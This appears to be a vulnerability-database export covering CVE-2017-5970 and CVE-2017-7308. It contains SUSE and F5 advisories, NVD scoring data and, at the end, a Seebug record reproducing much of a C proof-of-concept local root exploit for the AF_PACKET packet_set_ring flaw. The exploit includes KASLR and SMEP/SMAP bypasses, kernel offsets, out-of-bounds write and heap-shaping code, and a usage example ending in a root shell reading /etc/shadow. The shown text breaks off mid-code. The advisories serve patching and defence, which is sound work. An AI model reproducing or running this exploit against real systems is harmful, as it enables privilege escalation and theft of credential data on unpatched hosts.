{"bulletinFamily": "unix", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "viewCount": 11, "reporter": "Suse", "references": ["https://bugzilla.suse.com/1031660", "https://bugzilla.suse.com/1025013", "https://bugzilla.suse.com/1030575"], "description": "This update the for Linux Kernel 3.12.61-52.69 fixes one issue.\n\n The following security bug was fixed:\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed attackers to cause a\n denial of service (system crash) via (1) an application that made\n crafted system calls or possibly (2) IPv4 traffic with invalid IP\n options (bsc#1025013).\n - CVE-2017-7308: The packet_set_ring function in net/packet/af_packet.c in\n the Linux kernel did not properly validate certain block-size data,\n which allowed local users to cause a denial of service (overflow) or\n possibly have unspecified other impact via crafted system calls\n (bsc#1030575, bsc#1031660).\n\n", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00031.html", "modified": "2017-05-15T21:13:19", "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-15T19:20:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-5970", "CVE-2017-7308"]}, {"type": "f5", "idList": ["F5:K82224417", "F5:K60104355"]}, {"type": "seebug", "idList": ["SSV:93094"]}, {"type": "hackerone", "idList": ["H1:684567"]}, {"type": "virtuozzo", "idList": ["VZA-2017-032", "VZA-2017-027"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL60104355.NASL", "SUSE_SU-2017-1281-1.NASL", "SUSE_SU-2017-0780-1.NASL", "SUSE_SU-2017-0517-1.NASL", "SUSE_SU-2017-0769-1.NASL", "SUSE_SU-2017-0772-1.NASL", "VIRTUOZZO_VZA-2017-032.NASL", "SUSE_SU-2017-1302-1.NASL", "SUSE_SU-2017-0770-1.NASL", "SUSE_SU-2017-0771-1.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2017:0766-1", "SUSE-SU-2017:0780-1", "SUSE-SU-2017:0767-1", "SUSE-SU-2017:0771-1", "SUSE-SU-2017:0775-1", "SUSE-SU-2017:0764-1", "SUSE-SU-2017:0770-1", "SUSE-SU-2017:0760-1", "SUSE-SU-2017:0763-1", "SUSE-SU-2017:0777-1"]}, {"type": "ubuntu", "idList": ["USN-3256-1", "USN-3256-2"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872392", "OPENVAS:1361412562310872391", "OPENVAS:1361412562310843127", "OPENVAS:1361412562310843128"]}, {"type": "zdt", "idList": ["1337DAY-ID-27761", "1337DAY-ID-33035", "1337DAY-ID-30376"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:66230DDA8228F7537211A7F78C05A763", "EXPLOITPACK:4CB8F52029A7ED20CD5AD83DA63EF19E"]}, {"type": "exploitdb", "idList": ["EDB-ID:41994", "EDB-ID:47168", "EDB-ID:44654"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:2DD582EFE729277C37B69440AE62247E"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-3579", "ELSA-2017-3580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147685"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_PACKET_SET_RING_PRIV_ESC", "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_PACKET_SET_RING_PRIV_ESC/"]}, {"type": "fedora", "idList": ["FEDORA:79A0B6175384", "FEDORA:3D3EF633571E"]}, {"type": "threatpost", "idList": ["THREATPOST:1EFFF77A39E186D173F6DF0D1259D4DE"]}], "modified": "2017-05-15T19:20:15", "rev": 2}, "vulnersScore": 7.6}, "id": "SUSE-SU-2017:1281-1", "title": "Security update for Linux Kernel Live Patch 20 for SLE 12 (important)", "edition": 1, "published": "2017-05-15T21:13:19", "type": "suse", "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for SAP", "packageVersion": "4.1", "packageFilename": "kgraft-patch-3_12_61-52_69-default-2-4.1.x86_64.rpm", "packageName": "kgraft-patch-3_12_61-52_69-default-2", "operator": "lt", "arch": "x86_64", "OSVersion": "12"}, {"OS": "SUSE Linux Enterprise Server LTSS", "packageVersion": "4.1", "packageFilename": "kgraft-patch-3_12_61-52_69-xen-2-4.1.x86_64.rpm", "packageName": "kgraft-patch-3_12_61-52_69-xen-2", "operator": "lt", "arch": "x86_64", "OSVersion": "12"}, {"OS": "SUSE Linux Enterprise Server for SAP", "packageVersion": "4.1", "packageFilename": "kgraft-patch-3_12_61-52_69-xen-2-4.1.x86_64.rpm", "packageName": "kgraft-patch-3_12_61-52_69-xen-2", "operator": "lt", "arch": "x86_64", "OSVersion": "12"}, {"OS": "SUSE Linux Enterprise Server LTSS", "packageVersion": "4.1", "packageFilename": "kgraft-patch-3_12_61-52_69-default-2-4.1.x86_64.rpm", "packageName": "kgraft-patch-3_12_61-52_69-default-2", "operator": "lt", "arch": "x86_64", "OSVersion": "12"}], "cvelist": ["CVE-2017-5970", "CVE-2017-7308"], "lastseen": "2017-05-15T19:20:15"}

{"cve": [{"lastseen": "2021-02-02T06:36:48", "description": "The ipv4_pktinfo_prepare function in net/ipv4/ip_sockglue.c in the Linux kernel through 4.9.9 allows attackers to cause a denial of service (system crash) via (1) an application that makes crafted system calls or possibly (2) IPv4 traffic with invalid IP options.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-14T06:59:00", "title": "CVE-2017-5970", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5970"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:linux:linux_kernel:4.9.9"], "id": "CVE-2017-5970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5970", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.9.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "The packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (integer signedness error and out-of-bounds write), or gain privileges (if the CAP_NET_RAW capability is held), via crafted system calls.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-29T20:59:00", "title": "CVE-2017-7308", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7308"], "modified": "2018-06-20T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.10.6"], "id": "CVE-2017-7308", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7308", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.10.6:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:39:24", "bulletinFamily": "software", "cvelist": ["CVE-2017-5970"], "description": "\nF5 Product Development has assigned ID 651741 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H60104355 on the **Diagnostics** &gt; **Identified** &gt; **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP AAM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | High | Linux kernel \nBIG-IP AFM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | High | Linux kernel \nBIG-IP Analytics | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP APM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP ASM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP DNS | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 | High | Linux kernel \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP PEM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | High | Linux kernel \nBIG-IP PSM | None | 11.4.0 - 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.1.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 14.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n**Impact of action:** Performing the suggested mitigation should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2018-12-17T22:52:00", "published": "2017-04-19T00:09:00", "id": "F5:K60104355", "href": "https://support.f5.com/csp/article/K60104355", "title": "Linux kernel vulnerability CVE-2017-5970", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-04-30T18:21:15", "bulletinFamily": "software", "cvelist": ["CVE-2017-7308"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability. F5 Product Development has assigned ID 660689 (BIG-IP) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.01 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.01 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2017-06-09T16:27:00", "published": "2017-05-05T09:15:00", "id": "F5:K82224417", "href": "https://support.f5.com/csp/article/K82224417", "title": "Linux kernel vulnerability CVE-2017-7308", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:58:10", "description": "The packet_set_ring function in `net/packet/af_packet.c` in the Linux kernel through `4.10.6` does not properly validate certain block-size data, which allows local users to cause a `denial of service` (integer signedness error and out-of-bounds write), or `gain privileges` (if the CAP_NET_RAW capability is held), via crafted system calls.", "published": "2017-05-11T00:00:00", "type": "seebug", "title": "Linux kernel Local Denial of Service Vulnerability (CVE-2017-7308 )", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2017-05-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93094", "id": "SSV:93094", "sourceData": "\n // A proof-of-concept local root exploit for CVE-2017-7308.\r\n// Includes a SMEP & SMAP bypass.\r\n// Tested on 4.8.0-41-generic Ubuntu kernel.\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [.] done, kernel text: ffffffff87000000\r\n// [.] commit_creds: ffffffff870a5cf0\r\n// [.] prepare_kernel_cred: ffffffff870a60e0\r\n// [.] native_write_cr4: ffffffff87064210\r\n// [.] padding heap\r\n// [.] done, heap is padded\r\n// [.] SMEP & SMAP bypass enabled, turning them off\r\n// [.] done, SMEP & SMAP should be off now\r\n// [.] executing get root payload 0x401516\r\n// [.] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sched.h>\r\n\r\n#include <sys/ioctl.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <netinet/if_ether.h>\r\n#include <net/if.h>\r\n\r\n#define ENABLE_KASLR_BYPASS\t1\r\n#define ENABLE_SMEP_SMAP_BYPASS\t1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = \t0xffffffff81000000ul;\r\n\r\n// Kernel symbol offsets\r\n#define COMMIT_CREDS\t\t0xa5cf0ul\r\n#define PREPARE_KERNEL_CRED\t0xa60e0ul\r\n#define NATIVE_WRITE_CR4\t0x64210ul\r\n\r\n// Should have SMEP and SMAP bits disabled\r\n#define CR4_DESIRED_VALUE\t0x407f0ul\r\n\r\n#define KMALLOC_PAD\t\t512\r\n#define PAGEALLOC_PAD\t\t1024\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\ntypedef uint32_t u32;\r\n\r\n// $ pahole -C hlist_node ./vmlinux\r\nstruct hlist_node {\r\n\tstruct hlist_node * next; /* 0 8 */\r\n\tstruct hlist_node * * pprev; /* 8 8 */\r\n};\r\n\r\n// $ pahole -C timer_list ./vmlinux\r\nstruct timer_list {\r\n\tstruct hlist_node entry; /* 0 16 */\r\n\tlong unsigned int expires; /* 16 8 */\r\n\tvoid (*function)(long unsigned int); /* 24 8 */\r\n\tlong unsigned int data; /* 32 8 */\r\n\tu32 flags; /* 40 4 */\r\n\tint start_pid; /* 44 4 */\r\n\tvoid * start_site; /* 48 8 */\r\n\tchar start_comm[16]; /* 56 16 */\r\n};\r\n\r\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\r\n#define TIMER_OFFSET\t896\r\n\r\n// pakcet_sock->xmit\r\n#define XMIT_OFFSET\t1304\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\r\n\t\tunsigned int frame_size, unsigned int block_nr,\r\n\t\tunsigned int sizeof_priv, unsigned int timeout) {\r\n\tint v = TPACKET_V3;\r\n\tint rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\r\n\tif (rv < 0) {\r\n\t\tperror(\"[-] setsockopt(PACKET_VERSION)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct tpacket_req3 req;\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.tp_block_size = block_size;\r\n\treq.tp_frame_size = frame_size;\r\n\treq.tp_block_nr = block_nr;\r\n\treq.tp_frame_nr = (block_size * block_nr) / frame_size;\r\n\treq.tp_retire_blk_tov = timeout;\r\n\treq.tp_sizeof_priv = sizeof_priv;\r\n\treq.tp_feature_req_word = 0;\r\n\r\n\trv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\r\n\tif (rv < 0) {\r\n\t\tperror(\"[-] setsockopt(PACKET_RX_RING)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\r\n\t\tunsigned int block_nr, unsigned int sizeof_priv, int timeout) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\r\n\tif (s < 0) {\r\n\t\tperror(\"[-] socket(AF_PACKET)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_rx_ring_init(s, block_size, frame_size, block_nr,\r\n\t\tsizeof_priv, timeout);\r\n\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_family = PF_PACKET;\r\n\tsa.sll_protocol = htons(ETH_P_ALL);\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_hatype = 0;\r\n\tsa.sll_pkttype = 0;\r\n\tsa.sll_halen = 0;\r\n\r\n\tint rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));\r\n\tif (rv < 0) {\r\n\t\tperror(\"[-] bind(AF_PACKET)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\treturn s;\r\n}\r\n\r\nvoid packet_socket_send(int s, char *buffer, int size) {\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_halen = ETH_ALEN;\r\n\r\n\tif (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\r\n\t\t\tsizeof(sa)) < 0) {\r\n\t\tperror(\"[-] sendto(SOCK_RAW)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid loopback_send(char *buffer, int size) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket(SOCK_RAW)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_send(s, buffer, size);\r\n}\r\n\r\nint packet_sock_kmalloc() {\r\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket(SOCK_DGRAM)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\treturn s;\r\n}\r\n\r\nvoid packet_sock_timer_schedule(int s, int timeout) {\r\n\tpacket_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\r\n}\r\n\r\nvoid packet_sock_id_match_trigger(int s) {\r\n\tchar buffer[16];\r\n\tpacket_socket_send(s, &buffer[0], sizeof(buffer));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define ALIGN(x, a)\t\t\t__ALIGN_KERNEL((x), (a))\r\n#define __ALIGN_KERNEL(x, a)\t\t__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\r\n#define __ALIGN_KERNEL_MASK(x, mask)\t(((x) + (mask)) & ~(mask))\r\n\r\n#define V3_ALIGNMENT\t(8)\r\n#define BLK_HDR_LEN\t(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\r\n\r\n#define ETH_HDR_LEN\tsizeof(struct ethhdr)\r\n#define IP_HDR_LEN\tsizeof(struct iphdr)\r\n#define UDP_HDR_LEN\tsizeof(struct udphdr)\r\n\r\n#define UDP_HDR_LEN_FULL\t(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\r\n\r\nint oob_setup(int offset) {\r\n\tunsigned int maclen = ETH_HDR_LEN;\r\n\tunsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\r\n\t\t\t\t(maclen < 16 ? 16 : maclen));\r\n\tunsigned int macoff = netoff - maclen;\r\n\tunsigned int sizeof_priv = (1u<<31) + (1u<<30) +\r\n\t\t0x8000 - BLK_HDR_LEN - macoff + offset;\r\n\treturn packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\r\n}\r\n\r\nvoid oob_write(char *buffer, int size) {\r\n\tloopback_send(buffer, size);\r\n}\r\n\r\nvoid oob_timer_execute(void *func, unsigned long arg) {\r\n\toob_setup(2048 + TIMER_OFFSET - 8);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++) {\r\n\t\tint timer = packet_sock_kmalloc();\r\n\t\tpacket_sock_timer_schedule(timer, 1000);\r\n\t}\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, sizeof(buffer));\r\n\r\n\tstruct timer_list *timer = (struct timer_list *)&buffer[8];\r\n\ttimer->function = func;\r\n\ttimer->data = arg;\r\n\ttimer->flags = 1;\r\n\r\n\toob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\r\n\r\n\tsleep(1);\r\n}\r\n\r\nvoid oob_id_match_execute(void *func) {\r\n\tint s = oob_setup(2048 + XMIT_OFFSET - 64);\r\n\r\n\tint ps[32];\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tps[i] = packet_sock_kmalloc();\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, 2048);\r\n\r\n\tvoid **xmit = (void **)&buffer[64];\r\n\t*xmit = func;\r\n\r\n\toob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\r\n\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tpacket_sock_id_match_trigger(ps[i]);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\nvoid kmalloc_pad(int count) {\r\n\tint i;\r\n\tfor (i = 0; i < count; i++)\r\n\t\tpacket_sock_kmalloc();\r\n}\r\n\r\nvoid pagealloc_pad(int count) {\r\n\tpacket_socket_setup(0x8000, 2048, count, 0, 100);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * 